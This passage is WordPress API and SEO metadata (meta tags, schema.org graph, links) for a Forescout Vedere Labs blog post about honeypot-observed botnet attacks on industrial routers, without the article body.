property=\"og:url\" content=\"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/\" \/>\n<meta property=\"og:site_name\" content=\"Forescout\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/ForescoutTechnologies\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-11T13:00:03+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-feature.webp\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"628\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/webp\" \/>\n<meta name=\"author\" content=\"Forescout Research - Vedere Labs\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@Forescout\" \/>\n<meta name=\"twitter:site\" content=\"@Forescout\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"16 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/\"},\"author\":{\"name\":\"Forescout Research - Vedere Labs\",\"@id\":\"https:\/\/www.forescout.com\/#\/schema\/person\/038ef2eda17d37f87d9978fa703ee984\"},\"headline\":\"OT Network Security Threats: Industrial Routers Under Attack\",\"datePublished\":\"2025-12-11T13:00:03+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/\"},\"wordCount\":2774,\"publisher\":{\"@id\":\"https:\/\/www.forescout.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-feature.webp\",\"articleSection\":[\"Research &amp; Cyber Alerts\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/\",\"url\":\"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/\",\"name\":\"OT Network Security Threats: Industrial Routers Under Attack\",\"isPartOf\":{\"@id\":\"https:\/\/www.forescout.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-feature.webp\",\"datePublished\":\"2025-12-11T13:00:03+00:00\",\"description\":\"Industrial routers face escalating botnet attacks. Our honeypot analysis reveals emerging OT network security threats targeting edge devices.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/#primaryimage\",\"url\":\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-feature.webp\",\"contentUrl\":\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-feature.webp\",\"width\":1200,\"height\":628},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.forescout.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"OT Network Security Threats: Industrial Routers Under Attack\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.forescout.com\/#website\",\"url\":\"https:\/\/www.forescout.com\/\",\"name\":\"Forescout\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/www.forescout.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.forescout.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.forescout.com\/#organization\",\"name\":\"Forescout Technologies, Inc.\",\"url\":\"https:\/\/www.forescout.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.forescout.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.forescout.com\/wp-content\/uploads\/2019\/01\/forescout-logo.svg\",\"contentUrl\":\"https:\/\/www.forescout.com\/wp-content\/uploads\/2019\/01\/forescout-logo.svg\",\"width\":1,\"height\":1,\"caption\":\"Forescout Technologies, Inc.\"},\"image\":{\"@id\":\"https:\/\/www.forescout.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/ForescoutTechnologies\",\"https:\/\/x.com\/Forescout\",\"https:\/\/www.instagram.com\/forescouttechnologies\/\",\"https:\/\/www.linkedin.com\/company\/forescout-technologies\",\"https:\/\/www.youtube.com\/user\/forescout1\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.forescout.com\/#\/schema\/person\/038ef2eda17d37f87d9978fa703ee984\",\"name\":\"Forescout Research - Vedere Labs\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.forescout.com\/#\/schema\/person\/image\/b4c8db5600adef8fa1a89cc86e15c781\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6f43608a91eb86cde1564e21650235d0ed570d1ae0fbd371a265636ed603e70d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6f43608a91eb86cde1564e21650235d0ed570d1ae0fbd371a265636ed603e70d?s=96&d=mm&r=g\",\"caption\":\"Forescout Research - Vedere Labs\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"OT Network Security Threats: Industrial Routers Under Attack","description":"Industrial routers face escalating botnet attacks. Our honeypot analysis reveals emerging OT network security threats targeting edge devices.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/","og_locale":"en_US","og_type":"article","og_title":"OT Network Security Threats: Industrial Routers Under Attack","og_description":"Industrial routers face escalating botnet attacks. Our honeypot analysis reveals emerging OT network security threats targeting edge devices.","og_url":"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/","og_site_name":"Forescout","article_publisher":"https:\/\/www.facebook.com\/ForescoutTechnologies","article_published_time":"2025-12-11T13:00:03+00:00","og_image":[{"width":1200,"height":628,"url":"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-feature.webp","type":"image\/webp"}],"author":"Forescout Research - Vedere Labs","twitter_card":"summary_large_image","twitter_creator":"@Forescout","twitter_site":"@Forescout","twitter_misc":{"Est. reading time":"16 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/#article","isPartOf":{"@id":"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/"},"author":{"name":"Forescout Research - Vedere Labs","@id":"https:\/\/www.forescout.com\/#\/schema\/person\/038ef2eda17d37f87d9978fa703ee984"},"headline":"OT Network Security Threats: Industrial Routers Under Attack","datePublished":"2025-12-11T13:00:03+00:00","mainEntityOfPage":{"@id":"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/"},"wordCount":2774,"publisher":{"@id":"https:\/\/www.forescout.com\/#organization"},"image":{"@id":"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/#primaryimage"},"thumbnailUrl":"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-feature.webp","articleSection":["Research &amp; Cyber Alerts"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/","url":"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/","name":"OT Network Security Threats: Industrial Routers Under Attack","isPartOf":{"@id":"https:\/\/www.forescout.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/#primaryimage"},"image":{"@id":"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/#primaryimage"},"thumbnailUrl":"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-feature.webp","datePublished":"2025-12-11T13:00:03+00:00","description":"Industrial routers face escalating botnet attacks. Our honeypot analysis reveals emerging OT network security threats targeting edge devices.","breadcrumb":{"@id":"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/#primaryimage","url":"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-feature.webp","contentUrl":"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-feature.webp","width":1200,"height":628},{"@type":"BreadcrumbList","@id":"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.forescout.com\/"},{"@type":"ListItem","position":2,"name":"OT Network Security Threats: Industrial Routers Under Attack"}]},{"@type":"WebSite","@id":"https:\/\/www.forescout.com\/#website","url":"https:\/\/www.forescout.com\/","name":"Forescout","description":"","publisher":{"@id":"https:\/\/www.forescout.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.forescout.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.forescout.com\/#organization","name":"Forescout Technologies, Inc.","url":"https:\/\/www.forescout.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.forescout.com\/#\/schema\/logo\/image\/","url":"https:\/\/www.forescout.com\/wp-content\/uploads\/2019\/01\/forescout-logo.svg","contentUrl":"https:\/\/www.forescout.com\/wp-content\/uploads\/2019\/01\/forescout-logo.svg","width":1,"height":1,"caption":"Forescout Technologies, Inc."},"image":{"@id":"https:\/\/www.forescout.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/ForescoutTechnologies","https:\/\/x.com\/Forescout","https:\/\/www.instagram.com\/forescouttechnologies\/","https:\/\/www.linkedin.com\/company\/forescout-technologies","https:\/\/www.youtube.com\/user\/forescout1"]},{"@type":"Person","@id":"https:\/\/www.forescout.com\/#\/schema\/person\/038ef2eda17d37f87d9978fa703ee984","name":"Forescout Research - Vedere Labs","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.forescout.com\/#\/schema\/person\/image\/b4c8db5600adef8fa1a89cc86e15c781","url":"https:\/\/secure.gravatar.com\/avatar\/6f43608a91eb86cde1564e21650235d0ed570d1ae0fbd371a265636ed603e70d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6f43608a91eb86cde1564e21650235d0ed570d1ae0fbd371a265636ed603e70d?s=96&d=mm&r=g","caption":"Forescout Research - Vedere Labs"}}]}},"featured_media_url":"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-feature.webp","is_file":false,"excerpt_manually_set":true,"_links":{"self":[{"href":"https:\/\/www.forescout.com\/wp-json\/wp\/v2\/posts\/109984","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.forescout.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.forescout.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.forescout.com\/wp-json\/wp\/v2\/users\/124"}],"replies":[{"embeddable":true,"href":"https:\/\/www.forescout.com\/wp-json\/wp\/v2\/comments?post=109984"}],"version-history":[{"count":0,"href":"https:\/\/www.forescout.com\/wp-json\/wp\/v2\/posts\/109984\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.forescout.com\/wp-json\/wp\/v2\/media\/109986"}],"wp:attachment":[{"href":"https:\/\/www.forescout.com\/wp-json\/wp\/v2\/media?parent=109984"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.forescout.com\/wp-json\/wp\/v2\/categories?post=109984"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.forescout.com\/wp-json\/wp\/v2\/tags?post=109984"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.forescout.com\/wp-json\/wp\/v2\/coauthors?post=109984"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}